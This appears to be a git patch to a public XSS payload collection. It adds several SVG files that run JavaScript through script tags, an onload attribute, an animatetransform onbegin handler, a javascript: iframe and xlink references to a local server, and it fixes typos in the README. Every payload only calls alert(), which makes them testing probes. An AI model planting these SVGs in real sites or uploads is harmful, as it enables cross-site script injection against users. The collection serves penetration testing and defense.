From acb509d4361741ee875a82877481da9dfe82d3bb Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 2 Nov 2024 11:27:26 +0100
Subject: [PATCH] SVG XSS fix typo from #729 + files

---
 .../{SVG_XSS.svg => SVG_XSS_green_triangle.svg}   |  0
 XSS Injection/Files/SVG_XSS_nested_img_xlink.svg  |  3 +++
 XSS Injection/Files/SVG_XSS_nested_svg.svg        | 10 ++++++++++
 XSS Injection/Files/SVG_XSS_nested_use_xlink.svg  |  3 +++
 XSS Injection/Files/SVG_XSS_red_lightning.svg     | 15 +++++++++++++++
 XSS Injection/README.md                           |  4 ++--
 6 files changed, 33 insertions(+), 2 deletions(-)
 rename XSS Injection/Files/{SVG_XSS.svg => SVG_XSS_green_triangle.svg} (100%)
 create mode 100644 XSS Injection/Files/SVG_XSS_nested_img_xlink.svg
 create mode 100644 XSS Injection/Files/SVG_XSS_nested_svg.svg
 create mode 100644 XSS Injection/Files/SVG_XSS_nested_use_xlink.svg
 create mode 100644 XSS Injection/Files/SVG_XSS_red_lightning.svg

diff --git a/XSS Injection/Files/SVG_XSS.svg b/XSS Injection/Files/SVG_XSS_green_triangle.svg
similarity index 100%
rename from XSS Injection/Files/SVG_XSS.svg
rename to XSS Injection/Files/SVG_XSS_green_triangle.svg
diff --git a/XSS Injection/Files/SVG_XSS_nested_img_xlink.svg b/XSS Injection/Files/SVG_XSS_nested_img_xlink.svg
new file mode 100644
index 0000000..ee16371
--- /dev/null
+++ b/XSS Injection/Files/SVG_XSS_nested_img_xlink.svg	
@@ -0,0 +1,3 @@
+<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+  <image xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg" height="200" width="200"/>
+</svg>
\ No newline at end of file
diff --git a/XSS Injection/Files/SVG_XSS_nested_svg.svg b/XSS Injection/Files/SVG_XSS_nested_svg.svg
new file mode 100644
index 0000000..9fa7741
--- /dev/null
+++ b/XSS Injection/Files/SVG_XSS_nested_svg.svg	
@@ -0,0 +1,10 @@
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+  <svg x="10">
+    <rect x="10" y="10" height="100" width="100" style="fill: #002654"/>
+    <script type="text/javascript">alert('sub-svg 1');</script>
+  </svg>
+  <svg x="200">
+    <rect x="10" y="10" height="100" width="100" style="fill: #ED2939"/>
+    <script type="text/javascript">alert('sub-svg 2');</script>
+  </svg>
+</svg>
\ No newline at end of file
diff --git a/XSS Injection/Files/SVG_XSS_nested_use_xlink.svg b/XSS Injection/Files/SVG_XSS_nested_use_xlink.svg
new file mode 100644
index 0000000..376d584
--- /dev/null
+++ b/XSS Injection/Files/SVG_XSS_nested_use_xlink.svg	
@@ -0,0 +1,3 @@
+<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+  <use xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg#lightning"/>
+</svg>
\ No newline at end of file
diff --git a/XSS Injection/Files/SVG_XSS_red_lightning.svg b/XSS Injection/Files/SVG_XSS_red_lightning.svg
new file mode 100644
index 0000000..cc54279
--- /dev/null
+++ b/XSS Injection/Files/SVG_XSS_red_lightning.svg	
@@ -0,0 +1,15 @@
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" baseProfile="full" width="100" height="100" xmlns="http://www.w3.org/2000/svg" onload="alert('svg attribut')">
+  <polygon id="lightning" points="0,100 50,25 50,75 100,0" fill="#ff1919" stroke="#ff0000"/>
+  <desc><script>alert('svg desc')</script></desc>
+  <foreignObject><script>alert('svg foreignObject')</script></foreignObject>
+  <foreignObject width="500" height="500">
+    <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert('svg foreignObject iframe');" width="400" height="250"/>
+  </foreignObject>
+  <title><script>alert('svg title')</script></title>
+  <animatetransform onbegin="alert('svg animatetransform onbegin')"></animatetransform>
+  <script type="text/javascript">
+    alert('svg script');
+  </script>
+</svg>
\ No newline at end of file
diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index c329727..b94b593 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -398,7 +398,7 @@ Simple script. Codename: green triangle
 </svg>
 ```
 
-More comprehensive payload with svg tag attribute, desc script, foreignObject script, foreignObject iframe, title script, animatetransform event and simple script. Codename: red lignthning. Author: noraj.
+More comprehensive payload with svg tag attribute, desc script, foreignObject script, foreignObject iframe, title script, animatetransform event and simple script. Codename: red ligthning. Author: noraj.
 
 ```xml
 <?xml version="1.0" standalone="no"?>
@@ -443,7 +443,7 @@ SVG 1.x (xlink:href)
 </svg>
 ```
 
-Including a remote SVG fragment in a SVG works but won't trigger the XSS embedded in the remote SVG element because it's impossible to add vulnerable attribute on a polygon/rect/etc sicne the `style` attribute is no longer a vector on modern browsers. Author: noraj.
+Including a remote SVG fragment in a SVG works but won't trigger the XSS embedded in the remote SVG element because it's impossible to add vulnerable attribute on a polygon/rect/etc since the `style` attribute is no longer a vector on modern browsers. Author: noraj.
 
 SVG 1.x (xlink:href)